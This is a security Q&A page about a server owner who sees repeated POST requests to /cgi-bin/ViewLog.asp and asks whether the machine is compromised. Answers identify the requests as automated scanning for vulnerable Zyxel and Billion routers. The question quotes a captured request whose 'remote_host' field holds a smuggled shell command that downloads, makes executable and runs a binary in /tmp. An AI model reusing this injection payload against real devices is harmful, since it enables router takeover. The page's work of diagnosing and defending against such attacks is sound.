Constant POST request spam to /cgi-bin/ViewLog.asp endpoint

I’ve got a DigitalOcean server that I use for different temporary servers. Lately I’ve found that sometimes I get a constant spam of the following requests:


    Connection: keep-alive
    Accept-Encoding": gzip, deflate
    Accept: */*
    User-Agent: B4ckdoor-owned-you
    Content-Length: 176
    Content-Type: application/x-www-form-urlencoded

    " remote_submit_Flag": "1", // Space is not a typo
    "remote_syslog_Flag": "1",
    "RemoteSyslogSupported": "1",
    "LogFlag": "0",
    "remote_host": ";cd /tmp;wget;chmod 777 xd.arm7;./xd.arm7;rm -rf xd.arm"

Which does not really bother me since I run Node.js servers only. What bothers me is the repetition of the attack and the Host header (although I believe this one can be faked).

I’ve used to run a DNS server that defaulted to Google DNS, that I left unattended for some time and it gathered 1.5TB of traffic in one month. The named -v shows version 9.11.3-1ubuntu1.12-Ubuntu.

Is the server compomised?

Information Security Asked on December 26, 2020

2 Answers

2 Answers

It looks like an automated search for vulnerable machines over the 'net.

The "" host can be a faked part of the http request that comes from some other address. (localhost) gets less security checks in a lot of networked systems.

It is rather unusual, but not absolutely pointless for someone that already can execute code on your machine to scan for vulnerabilities from inside - he is already in.

You may as well look for HTTP access log and see how this request is logged.

As for DNS: unless you know what you are doing, don't run public DNS.

p.s. no one can say if your machine is compromised, but since it is for temporary use, it is better to reinstall it.

Answered by fraxinus on December 26, 2020

You are right about the fact that he host header can easily be faked, however I assume that you've got the POST right from yours logs - and that indicates that the requests come from (or via) your localhost indeed.
Some attacker code might try to exploit:

which is aimed at (rebranded) Zyxel and Billion routers. This attack is unlikely to cause any harm to you as you're obviously not running your node.js stuff on a router, however the sole fact that something uncontrolled seems to originate from (or be forwarded by) your localhost should be investigated.

Answered by lab9 on December 26, 2020

Add your own answers!

Related Questions

What’s a “safe” URL shortening algorithm?

3  Asked on December 31, 2020 by bensower


Securing internet connection with hostile ISP

1  Asked on December 29, 2020 by user242761


Is Chrome Browser/ Computer compromised by KMSPico?

0  Asked on December 27, 2020 by waterbyte


Web Cache Deception – exploitable without a cache server?

1  Asked on December 26, 2020 by citylight


Determine if private key belongs to certificate?

3  Asked on December 25, 2020 by thanatos


Filtering http responses for subdomain takeover

0  Asked on December 21, 2020 by kirill-z


Sql map Manual Vulnerability Assessment

1  Asked on December 20, 2020 by badddy


Unknown folders in OneDrive

1  Asked on December 19, 2020 by user851


Ask a Question

Get help from others!

© 2022 All rights reserved.